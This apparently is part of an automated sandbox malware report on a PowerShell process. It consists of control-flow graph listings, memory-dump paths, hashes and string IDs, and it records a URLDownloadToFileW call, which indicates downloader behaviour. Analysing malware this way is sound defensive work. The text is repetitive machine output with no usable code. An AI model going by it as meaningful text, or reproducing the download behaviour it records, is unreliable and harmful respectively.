                                                                                                                                                                                                              control_flow_graph 338 4987a18-4987a4a 339 4987a4c-4987a53 338->339 340 4987a90 338->340 342 4987a64 339->342 343 4987a55-4987a62 339->343 341 4987a93-4987acf 340->341 351 4987b58-4987b63 341->351 352 4987ad5-4987ade 341->352 344 4987a66-4987a68 342->344 343->344 347 4987a6a-4987a6d 344->347 348 4987a6f-4987a71 344->348 353 4987a8e 347->353 349 4987a82 348->349 350 4987a73-4987a80 348->350 354 4987a84-4987a86 349->354 350->354 355 4987b72-4987b94 351->355 356 4987b65-4987b68 351->356 352->351 357 4987ae0-4987ae6 352->357 353->341 354->353 365 4987b9a-4987ba3 355->365 366 4987c5e-4987cf6 355->366 356->355 359 4987de8-4987df9 357->359 360 4987aec-4987af9 357->360 368 4987dfa-4987dfd 359->368 362 4987afb-4987b2e 360->362 363 4987b4f-4987b56 360->363 377 4987b4b 362->377 378 4987b30-4987b33 362->378 363->351 363->357 365->359 369 4987ba9-4987be7 365->369 407 4987cf9-4987d52 366->407 370 4987dff-4987e2f 368->370 371 4987e31 368->371 384 4987be9-4987bff 369->384 385 4987c01-4987c14 369->385 370->371 371->368 376 4987e32-4987e52 371->376 387 4987e5d-4987e63 376->387 388 4987e54-4987e5a 376->388 377->363 380 4987b3f-4987b48 378->380 381 4987b35-4987b38 378->381 381->380 389 4987c16-4987c1d 384->389 385->389 390 4987e71-4987ea6 URLDownloadToFileW 387->390 391 4987e65-4987e6e 387->391 388->387 392 4987c1f-4987c30 389->392 393 4987c42-4987c58 389->393 395 4987ea8-4987eae 390->395 396 4987eaf-4987ec3 390->396 391->390 392->393 401 4987c32-4987c3b 392->401 393->365 393->366 395->396 401->393 420 4987d55 call 74b45ad 407->420 421 4987d55 call 74b4610 407->421 422 4987d55 call 74b45f5 407->422 412 4987d57-4987d60 413 4987d7a-4987d8d 412->413 414 4987d62-4987d78 412->414 415 4987d8f-4987d96 413->415 414->415 416 4987d98-4987d9e 415->416 417 4987da5-4987daf 415->417 416->417 417->407 420->412 421->412 422->412
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.1762409727.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4980000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 6290527cc6ae913d78e244ccd952ae0e95a18fb5ed99ff668e21f4e48f8d6cec
                                                                                                                                                                                                              • Instruction ID: b364652d2e17b1ae01d4fcc030a4da48979a56b57a613582307c406c8fddfb1e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6290527cc6ae913d78e244ccd952ae0e95a18fb5ed99ff668e21f4e48f8d6cec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AE10B75A01219EFCB05DF98D884A9EFBB2FF48310F248569E809AB351C735AD81CB90

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 0 74b1f40-74b1f65 1 74b1f6b-74b1f70 0->1 2 74b2158-74b21a2 0->2 3 74b1f88-74b1f8c 1->3 4 74b1f72-74b1f78 1->4 16 74b21a8-74b21ad 2->16 17 74b2326-74b236a 2->17 8 74b2108-74b2112 3->8 9 74b1f92-74b1f94 3->9 6 74b1f7a 4->6 7 74b1f7c-74b1f86 4->7 6->3 7->3 11 74b2120-74b2126 8->11 12 74b2114-74b211d 8->12 13 74b1f96-74b1fa2 9->13 14 74b1fa4 9->14 18 74b2128-74b212a 11->18 19 74b212c-74b2138 11->19 15 74b1fa6-74b1fa8 13->15 14->15 15->8 21 74b1fae-74b1fcd 15->21 22 74b21af-74b21b5 16->22 23 74b21c5-74b21c9 16->23 39 74b2480-74b24b5 17->39 40 74b2370-74b2375 17->40 24 74b213a-74b2155 18->24 19->24 56 74b1fcf-74b1fdb 21->56 57 74b1fdd 21->57 25 74b21b9-74b21c3 22->25 26 74b21b7 22->26 27 74b22d8-74b22e2 23->27 28 74b21cf-74b21d1 23->28 25->23 26->23 36 74b22ef-74b22f5 27->36 37 74b22e4-74b22ec 27->37 33 74b21d3-74b21df 28->33 34 74b21e1 28->34 38 74b21e3-74b21e5 33->38 34->38 42 74b22fb-74b2307 36->42 43 74b22f7-74b22f9 36->43 38->27 48 74b21eb-74b220a 38->48 58 74b24e3-74b24ed 39->58 59 74b24b7-74b24d9 39->59 44 74b238d-74b2391 40->44 45 74b2377-74b237d 40->45 49 74b2309-74b2323 42->49 43->49 54 74b2432-74b243c 44->54 55 74b2397-74b2399 44->55 52 74b237f 45->52 53 74b2381-74b238b 45->53 88 74b221a 48->88 89 74b220c-74b2218 48->89 52->44 53->44 66 74b2449-74b244f 54->66 67 74b243e-74b2446 54->67 62 74b239b-74b23a7 55->62 63 74b23a9 55->63 64 74b1fdf-74b1fe1 56->64 57->64 69 74b24ef-74b24f4 58->69 70 74b24f7-74b24fd 58->70 101 74b24db-74b24e0 59->101 102 74b252d-74b2556 59->102 68 74b23ab-74b23ad 62->68 63->68 64->8 71 74b1fe7-74b1fee 64->71 74 74b2451-74b2453 66->74 75 74b2455-74b2461 66->75 68->54 77 74b23b3-74b23b5 68->77 79 74b24ff-74b2501 70->79 80 74b2503-74b250f 70->80 71->2 78 74b1ff4-74b1ff9 71->78 82 74b2463-74b247d 74->82 75->82 83 74b23cf-74b23d6 77->83 84 74b23b7-74b23bd 77->84 85 74b1ffb-74b2001 78->85 86 74b2011-74b2020 78->86 87 74b2511-74b252a 79->87 80->87 95 74b23d8-74b23de 83->95 96 74b23ee-74b242f 83->96 93 74b23bf 84->93 94 74b23c1-74b23cd 84->94 97 74b2003 85->97 98 74b2005-74b200f 85->98 86->8 109 74b2026-74b2044 86->109 90 74b221c-74b221e 88->90 89->90 90->27 100 74b2224-74b225b 90->100 93->83 94->83 106 74b23e2-74b23ec 95->106 107 74b23e0 95->107 97->86 98->86 126 74b225d-74b2263 100->126 127 74b2275-74b227c 100->127 121 74b2558-74b257e 102->121 122 74b2585-74b25b4 102->122 106->96 107->96 109->8 124 74b204a-74b206f 109->124 121->122 129 74b25ed-74b25f7 122->129 130 74b25b6-74b25d3 122->130 124->8 151 74b2075-74b207c 124->151 131 74b2267-74b2273 126->131 132 74b2265 126->132 133 74b227e-74b2284 127->133 134 74b2294-74b22d5 127->134 136 74b25f9-74b25fd 129->136 137 74b2600-74b2606 129->137 147 74b263d-74b2642 130->147 148 74b25d5-74b25e7 130->148 131->127 132->127 138 74b2288-74b2292 133->138 139 74b2286 133->139 144 74b2608-74b260a 137->144 145 74b260c-74b2618 137->145 138->134 139->134 150 74b261a-74b263a 144->150 145->150 147->148 148->129 153 74b207e-74b2099 151->153 154 74b20c2-74b20f5 151->154 159 74b209b-74b20a1 153->159 160 74b20b3-74b20b7 153->160 167 74b20fc-74b2105 154->167 162 74b20a3 159->162 163 74b20a5-74b20b1 159->163 165 74b20be-74b20c0 160->165 162->160 163->160 165->167
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.1766813169.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                              • API String ID: 0-1420252700
                                                                                                                                                                                                              • Opcode ID: 3d29f8fdecbef69e2c5974f8f89fd86b8776f2ee696a6e65cbbd8fa00e326bfb
                                                                                                                                                                                                              • Instruction ID: 3133aa95156d5a0edda63a66d54a54adb62135d2e1626c7d39484ee334ef3c23
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d29f8fdecbef69e2c5974f8f89fd86b8776f2ee696a6e65cbbd8fa00e326bfb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB1226B1B043558FCB258B7888117EB7BA6AFC6311F1488ABD905CF381DA71DD46C7A2

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 172 74b4610-74b463b 173 74b4af2-74b4b25 172->173 174 74b4641-74b4646 172->174 182 74b4b27-74b4b33 173->182 183 74b4b35 173->183 175 74b4648-74b464e 174->175 176 74b465e-74b4663 174->176 177 74b4652-74b465c 175->177 178 74b4650 175->178 180 74b4673 176->180 181 74b4665-74b4671 176->181 177->176 178->176 184 74b4675-74b4677 180->184 181->184 188 74b4b37-74b4b39 182->188 183->188 185 74b467d-74b4687 184->185 186 74b4a93-74b4a9d 184->186 185->173 191 74b468d-74b4692 185->191 192 74b4aab-74b4ab1 186->192 193 74b4a9f-74b4aa8 186->193 189 74b4b7b-74b4b85 188->189 190 74b4b3b-74b4b42 188->190 199 74b4b8e-74b4b94 189->199 200 74b4b87-74b4b8b 189->200 190->189 194 74b4b44-74b4b61 190->194 197 74b46aa-74b46b8 191->197 198 74b4694-74b469a 191->198 195 74b4ab3-74b4ab5 192->195 196 74b4ab7-74b4ac3 192->196 210 74b4bc9-74b4bce 194->210 211 74b4b63-74b4b75 194->211 201 74b4ac5-74b4aef 195->201 196->201 197->186 214 74b46be-74b46dd 197->214 202 74b469e-74b46a8 198->202 203 74b469c 198->203 204 74b4b9a-74b4ba6 199->204 205 74b4b96-74b4b98 199->205 202->197 203->197 209 74b4ba8-74b4bc6 204->209 205->209 210->211 211->189 214->186 222 74b46e3-74b46ed 214->222 222->173 223 74b46f3-74b46f8 222->223 224 74b46fa-74b4700 223->224 225 74b4710-74b4714 223->225 226 74b4702 224->226 227 74b4704-74b470e 224->227 225->186 228 74b471a-74b471e 225->228 226->225 227->225 228->186 229 74b4724-74b4728 228->229 229->186 231 74b472e-74b473e 229->231 232 74b47c6-74b4815 231->232 233 74b4744-74b476b 231->233 250 74b481c-74b482f 232->250 238 74b476d-74b4773 233->238 239 74b4785-74b47b3 233->239 240 74b4777-74b4783 238->240 241 74b4775 238->241 248 74b47c1-74b47c4 239->248 249 74b47b5-74b47b7 239->249 240->239 241->239 248->250 249->248 251 74b48b7-74b4906 250->251 252 74b4835-74b485c 250->252 269 74b490d-74b4920 251->269 257 74b485e-74b4864 252->257 258 74b4876-74b48a4 252->258 260 74b4868-74b4874 257->260 261 74b4866 257->261 267 74b48b2-74b48b5 258->267 268 74b48a6-74b48a8 258->268 260->258 261->258 267->269 268->267 270 74b49a8-74b49f7 269->270 271 74b4926-74b494d 269->271 288 74b49fe-74b4a2c 270->288 276 74b494f-74b4955 271->276 277 74b4967-74b4995 271->277 279 74b4959-74b4965 276->279 280 74b4957 276->280 286 74b49a3-74b49a6 277->286 287 74b4997-74b4999 277->287 279->277 280->277 286->288 287->286 293 74b4a2f call 4987a18 288->293 294 74b4a2f call 4987a08 288->294 295 74b4a2f call 4981bf8 288->295 296 74b4a2f call 4987c45 288->296 291 74b4a34-74b4a90 293->291 294->291 295->291 296->291
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.1766813169.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: tP^q$tP^q
                                                                                                                                                                                                              • API String ID: 0-309238000
                                                                                                                                                                                                              • Opcode ID: b3ea380c02a88c9fa85d0cfbcd64a88683315942b8a0824d602ec00a7c6b7d2e
                                                                                                                                                                                                              • Instruction ID: 6ec502c412a0976f2623387941968a5fc53d6ec259e94b7da975aefe11ed4b28
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3ea380c02a88c9fa85d0cfbcd64a88683315942b8a0824d602ec00a7c6b7d2e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DDF106B5B00245AFDB249F6CC405BAABBE2EFC9310F14886AE9059B351DB31DC46C7E1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 297 74b04f8-74b04fe 298 74b0501-74b050a 297->298 299 74b05ca-74b05fd 298->299 300 74b050f-74b0517 298->300 303 74b066b-74b0675 299->303 304 74b05ff-74b063e 299->304 300->298 301 74b0518-74b0521 300->301 308 74b053b-74b0558 301->308 309 74b0523-74b0529 301->309 306 74b0680-74b0686 303->306 307 74b0677-74b067d 303->307 326 74b06bb-74b06c0 304->326 327 74b0640-74b064e 304->327 310 74b0688-74b068a 306->310 311 74b068c-74b0698 306->311 308->299 320 74b055a-74b057c 308->320 313 74b052b 309->313 314 74b052d-74b0539 309->314 315 74b069a-74b06b8 310->315 311->315 313->308 314->308 324 74b057e-74b0584 320->324 325 74b0596-74b05ae 320->325 329 74b0588-74b0594 324->329 330 74b0586 324->330 334 74b05bc-74b05c7 325->334 335 74b05b0-74b05b2 325->335 326->327 337 74b0656-74b0665 327->337 329->325 330->325 335->334 337->303
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.1766813169.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: tP^q$tP^q
                                                                                                                                                                                                              • API String ID: 0-309238000
                                                                                                                                                                                                              • Opcode ID: 71e9131d4a3bd879f56538e9c8293be1d36d4ad49c587568b0d39e0f1e6d73b0
                                                                                                                                                                                                              • Instruction ID: 6fcea08a4175544fd1e3e0125574c54a64c9acec99dc54fcb5ad24369a67694e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 71e9131d4a3bd879f56538e9c8293be1d36d4ad49c587568b0d39e0f1e6d73b0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09514AB1B003146FDB309B6888147ABBFE2AF89711F55C86BE549DF391CA31DC4687A1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 423 4981bf8-4981bff 424 4987e00-4987e2f 423->424 425 4987e31 424->425 426 4987dfa-4987dfd 425->426 427 4987e32-4987e52 425->427 426->425 428 4987dff 426->428 430 4987e5d-4987e63 427->430 431 4987e54-4987e5a 427->431 428->424 432 4987e71-4987ea6 URLDownloadToFileW 430->432 433 4987e65-4987e6e 430->433 431->430 434 4987ea8-4987eae 432->434 435 4987eaf-4987ec3 432->435 433->432 434->435
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 04987E99
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.1762409727.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4980000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DownloadFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1407266417-0
                                                                                                                                                                                                              • Opcode ID: 81559c6a6c8aa8cd52374eb709d2e8c27ef6c9c8b21ee65494365deabbb3ec5b
                                                                                                                                                                                                              • Instruction ID: 8c4f4d780a9d59864da5ac66425302ffd84d76c6275f3d6fe27488100edbaea1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81559c6a6c8aa8cd52374eb709d2e8c27ef6c9c8b21ee65494365deabbb3ec5b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 372117B5D01319EFCB00DF99D888ADEFBF4FB48310F208569E918A7250D374AA54CBA0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 437 74b45f5-74b463b 439 74b4af2-74b4b25 437->439 440 74b4641-74b4646 437->440 448 74b4b27-74b4b33 439->448 449 74b4b35 439->449 441 74b4648-74b464e 440->441 442 74b465e-74b4663 440->442 443 74b4652-74b465c 441->443 444 74b4650 441->444 446 74b4673 442->446 447 74b4665-74b4671 442->447 443->442 444->442 450 74b4675-74b4677 446->450 447->450 454 74b4b37-74b4b39 448->454 449->454 451 74b467d-74b4687 450->451 452 74b4a93-74b4a9d 450->452 451->439 457 74b468d-74b4692 451->457 458 74b4aab-74b4ab1 452->458 459 74b4a9f-74b4aa8 452->459 455 74b4b7b-74b4b85 454->455 456 74b4b3b-74b4b42 454->456 465 74b4b8e-74b4b94 455->465 466 74b4b87-74b4b8b 455->466 456->455 460 74b4b44-74b4b61 456->460 463 74b46aa-74b46b8 457->463 464 74b4694-74b469a 457->464 461 74b4ab3-74b4ab5 458->461 462 74b4ab7-74b4ac3 458->462 476 74b4bc9-74b4bce 460->476 477 74b4b63-74b4b75 460->477 467 74b4ac5-74b4aef 461->467 462->467 463->452 480 74b46be-74b46dd 463->480 468 74b469e-74b46a8 464->468 469 74b469c 464->469 470 74b4b9a-74b4ba6 465->470 471 74b4b96-74b4b98 465->471 468->463 469->463 475 74b4ba8-74b4bc6 470->475 471->475 476->477 477->455 480->452 488 74b46e3-74b46ed 480->488 488->439 489 74b46f3-74b46f8 488->489 490 74b46fa-74b4700 489->490 491 74b4710-74b4714 489->491 492 74b4702 490->492 493 74b4704-74b470e 490->493 491->452 494 74b471a-74b471e 491->494 492->491 493->491 494->452 495 74b4724-74b4728 494->495 495->452 497 74b472e-74b473e 495->497 498 74b47c6-74b4815 497->498 499 74b4744-74b476b 497->499 516 74b481c-74b482f 498->516 504 74b476d-74b4773 499->504 505 74b4785-74b47b3 499->505 506 74b4777-74b4783 504->506 507 74b4775 504->507 514 74b47c1-74b47c4 505->514 515 74b47b5-74b47b7 505->515 506->505 507->505 514->516 515->514 517 74b48b7-74b4906 516->517 518 74b4835-74b485c 516->518 535 74b490d-74b4920 517->535 523 74b485e-74b4864 518->523 524 74b4876-74b48a4 518->524 526 74b4868-74b4874 523->526 527 74b4866 523->527 533 74b48b2-74b48b5 524->533 534 74b48a6-74b48a8 524->534 526->524 527->524 533->535 534->533 536 74b49a8-74b49f7 535->536 537 74b4926-74b494d 535->537 554 74b49fe-74b4a2c 536->554 542 74b494f-74b4955 537->542 543 74b4967-74b4995 537->543 545 74b4959-74b4965 542->545 546 74b4957 542->546 552 74b49a3-74b49a6 543->552 553 74b4997-74b4999 543->553 545->543 546->543 552->554 553->552 559 74b4a2f call 4987a18 554->559 560 74b4a2f call 4987a08 554->560 561 74b4a2f call 4981bf8 554->561 562 74b4a2f call 4987c45 554->562 557 74b4a34-74b4a90 559->557 560->557 561->557 562->557
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.1766813169.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: tP^q
                                                                                                                                                                                                              • API String ID: 0-2862610199
                                                                                                                                                                                                              • Opcode ID: 3582f4ae67ff487b8e4d0cf9831daa747d6573d14a06645ac58c1ff1b336d4dd
                                                                                                                                                                                                              • Instruction ID: 762c8653e53c778290168e83a9326f5fba26e0efbba559a76f11cec5befb71c6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3582f4ae67ff487b8e4d0cf9831daa747d6573d14a06645ac58c1ff1b336d4dd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C91D4B4A002459FDB24CF6CC541BEABBF2BF89710F54845AE9059B352D731EC46CBA1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 563 74b45ad-74b45c4 564 74b4633-74b463b 563->564 565 74b45c6-74b45d1 563->565 568 74b4af2-74b4b25 564->568 569 74b4641-74b4646 564->569 566 74b45df-74b45f0 565->566 567 74b45d3-74b45d5 565->567 567->566 578 74b4b27-74b4b33 568->578 579 74b4b35 568->579 570 74b4648-74b464e 569->570 571 74b465e-74b4663 569->571 573 74b4652-74b465c 570->573 574 74b4650 570->574 576 74b4673 571->576 577 74b4665-74b4671 571->577 573->571 574->571 580 74b4675-74b4677 576->580 577->580 584 74b4b37-74b4b39 578->584 579->584 581 74b467d-74b4687 580->581 582 74b4a93-74b4a9d 580->582 581->568 587 74b468d-74b4692 581->587 588 74b4aab-74b4ab1 582->588 589 74b4a9f-74b4aa8 582->589 585 74b4b7b-74b4b85 584->585 586 74b4b3b-74b4b42 584->586 595 74b4b8e-74b4b94 585->595 596 74b4b87-74b4b8b 585->596 586->585 590 74b4b44-74b4b61 586->590 593 74b46aa-74b46b8 587->593 594 74b4694-74b469a 587->594 591 74b4ab3-74b4ab5 588->591 592 74b4ab7-74b4ac3 588->592 606 74b4bc9-74b4bce 590->606 607 74b4b63-74b4b75 590->607 597 74b4ac5-74b4aef 591->597 592->597 593->582 610 74b46be-74b46dd 593->610 598 74b469e-74b46a8 594->598 599 74b469c 594->599 600 74b4b9a-74b4ba6 595->600 601 74b4b96-74b4b98 595->601 598->593 599->593 605 74b4ba8-74b4bc6 600->605 601->605 606->607 607->585 610->582 618 74b46e3-74b46ed 610->618 618->568 619 74b46f3-74b46f8 618->619 620 74b46fa-74b4700 619->620 621 74b4710-74b4714 619->621 622 74b4702 620->622 623 74b4704-74b470e 620->623 621->582 624 74b471a-74b471e 621->624 622->621 623->621 624->582 625 74b4724-74b4728 624->625 625->582 627 74b472e-74b473e 625->627 628 74b47c6-74b4815 627->628 629 74b4744-74b476b 627->629 646 74b481c-74b482f 628->646 634 74b476d-74b4773 629->634 635 74b4785-74b47b3 629->635 636 74b4777-74b4783 634->636 637 74b4775 634->637 644 74b47c1-74b47c4 635->644 645 74b47b5-74b47b7 635->645 636->635 637->635 644->646 645->644 647 74b48b7-74b4906 646->647 648 74b4835-74b485c 646->648 665 74b490d-74b4920 647->665 653 74b485e-74b4864 648->653 654 74b4876-74b48a4 648->654 656 74b4868-74b4874 653->656 657 74b4866 653->657 663 74b48b2-74b48b5 654->663 664 74b48a6-74b48a8 654->664 656->654 657->654 663->665 664->663 666 74b49a8-74b49f7 665->666 667 74b4926-74b494d 665->667 684 74b49fe-74b4a2c 666->684 672 74b494f-74b4955 667->672 673 74b4967-74b4995 667->673 675 74b4959-74b4965 672->675 676 74b4957 672->676 682 74b49a3-74b49a6 673->682 683 74b4997-74b4999 673->683 675->673 676->673 682->684 683->682 689 74b4a2f call 4987a18 684->689 690 74b4a2f call 4987a08 684->690 691 74b4a2f call 4981bf8 684->691 692 74b4a2f call 4987c45 684->692 687 74b4a34-74b4a90 689->687 690->687 691->687 692->687
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.1766813169.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: tP^q
                                                                                                                                                                                                              • API String ID: 0-2862610199
                                                                                                                                                                                                              • Opcode ID: 7550358a9043c5fb1b7dbfd73ff1376396d63625a67b7852b0a9d8d30075bd37
                                                                                                                                                                                                              • Instruction ID: 700233eb24532596c03d65b48d3109b8a2c76aa320dc9d4720d1300a73f74301
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7550358a9043c5fb1b7dbfd73ff1376396d63625a67b7852b0a9d8d30075bd37
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D91C3B4E002859FDB24CF6CC544BEAB7B2BF89710F64885AD9059B352D731EC46CBA1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 977 74b1f38-74b1f65 980 74b1f6b-74b1f70 977->980 981 74b2158-74b21a2 977->981 982 74b1f88-74b1f8c 980->982 983 74b1f72-74b1f78 980->983 995 74b21a8-74b21ad 981->995 996 74b2326-74b236a 981->996 987 74b2108-74b2112 982->987 988 74b1f92-74b1f94 982->988 985 74b1f7a 983->985 986 74b1f7c-74b1f86 983->986 985->982 986->982 990 74b2120-74b2126 987->990 991 74b2114-74b211d 987->991 992 74b1f96-74b1fa2 988->992 993 74b1fa4 988->993 997 74b2128-74b212a 990->997 998 74b212c-74b2138 990->998 994 74b1fa6-74b1fa8 992->994 993->994 994->987 1000 74b1fae-74b1fcd 994->1000 1001 74b21af-74b21b5 995->1001 1002 74b21c5-74b21c9 995->1002 1018 74b2480-74b24b5 996->1018 1019 74b2370-74b2375 996->1019 1003 74b213a-74b2155 997->1003 998->1003 1035 74b1fcf-74b1fdb 1000->1035 1036 74b1fdd 1000->1036 1004 74b21b9-74b21c3 1001->1004 1005 74b21b7 1001->1005 1006 74b22d8-74b22e2 1002->1006 1007 74b21cf-74b21d1 1002->1007 1004->1002 1005->1002 1015 74b22ef-74b22f5 1006->1015 1016 74b22e4-74b22ec 1006->1016 1012 74b21d3-74b21df 1007->1012 1013 74b21e1 1007->1013 1017 74b21e3-74b21e5 1012->1017 1013->1017 1021 74b22fb-74b2307 1015->1021 1022 74b22f7-74b22f9 1015->1022 1017->1006 1027 74b21eb-74b220a 1017->1027 1037 74b24e3-74b24ed 1018->1037 1038 74b24b7-74b24d9 1018->1038 1023 74b238d-74b2391 1019->1023 1024 74b2377-74b237d 1019->1024 1028 74b2309-74b2323 1021->1028 1022->1028 1033 74b2432-74b243c 1023->1033 1034 74b2397-74b2399 1023->1034 1031 74b237f 1024->1031 1032 74b2381-74b238b 1024->1032 1067 74b221a 1027->1067 1068 74b220c-74b2218 1027->1068 1031->1023 1032->1023 1045 74b2449-74b244f 1033->1045 1046 74b243e-74b2446 1033->1046 1041 74b239b-74b23a7 1034->1041 1042 74b23a9 1034->1042 1043 74b1fdf-74b1fe1 1035->1043 1036->1043 1048 74b24ef-74b24f4 1037->1048 1049 74b24f7-74b24fd 1037->1049 1080 74b24db-74b24e0 1038->1080 1081 74b252d-74b2556 1038->1081 1047 74b23ab-74b23ad 1041->1047 1042->1047 1043->987 1050 74b1fe7-74b1fee 1043->1050 1053 74b2451-74b2453 1045->1053 1054 74b2455-74b2461 1045->1054 1047->1033 1056 74b23b3-74b23b5 1047->1056 1058 74b24ff-74b2501 1049->1058 1059 74b2503-74b250f 1049->1059 1050->981 1057 74b1ff4-74b1ff9 1050->1057 1061 74b2463-74b247d 1053->1061 1054->1061 1062 74b23cf-74b23d6 1056->1062 1063 74b23b7-74b23bd 1056->1063 1064 74b1ffb-74b2001 1057->1064 1065 74b2011-74b2020 1057->1065 1066 74b2511-74b252a 1058->1066 1059->1066 1074 74b23d8-74b23de 1062->1074 1075 74b23ee-74b242f 1062->1075 1072 74b23bf 1063->1072 1073 74b23c1-74b23cd 1063->1073 1076 74b2003 1064->1076 1077 74b2005-74b200f 1064->1077 1065->987 1088 74b2026-74b2044 1065->1088 1069 74b221c-74b221e 1067->1069 1068->1069 1069->1006 1079 74b2224-74b225b 1069->1079 1072->1062 1073->1062 1085 74b23e2-74b23ec 1074->1085 1086 74b23e0 1074->1086 1076->1065 1077->1065 1105 74b225d-74b2263 1079->1105 1106 74b2275-74b227c 1079->1106 1100 74b2558-74b257e 1081->1100 1101 74b2585-74b25b4 1081->1101 1085->1075 1086->1075 1088->987 1103 74b204a-74b206f 1088->1103 1100->1101 1108 74b25ed-74b25f7 1101->1108 1109 74b25b6-74b25d3 1101->1109 1103->987 1130 74b2075-74b207c 1103->1130 1110 74b2267-74b2273 1105->1110 1111 74b2265 1105->1111 1112 74b227e-74b2284 1106->1112 1113 74b2294-74b22d5 1106->1113 1115 74b25f9-74b25fd 1108->1115 1116 74b2600-74b2606 1108->1116 1126 74b263d-74b2642 1109->1126 1127 74b25d5-74b25e7 1109->1127 1110->1106 1111->1106 1117 74b2288-74b2292 1112->1117 1118 74b2286 1112->1118 1123 74b2608-74b260a 1116->1123 1124 74b260c-74b2618 1116->1124 1117->1113 1118->1113 1129 74b261a-74b263a 1123->1129 1124->1129 1126->1127 1127->1108 1132 74b207e-74b2099 1130->1132 1133 74b20c2-74b20f5 1130->1133 1138 74b209b-74b20a1 1132->1138 1139 74b20b3-74b20b7 1132->1139 1146 74b20fc-74b2105 1133->1146 1141 74b20a3 1138->1141 1142 74b20a5-74b20b1 1138->1142 1144 74b20be-74b20c0 1139->1144 1141->1139 1142->1139 1144->1146
                                                                                                                                                                                                              Memory Dump Source
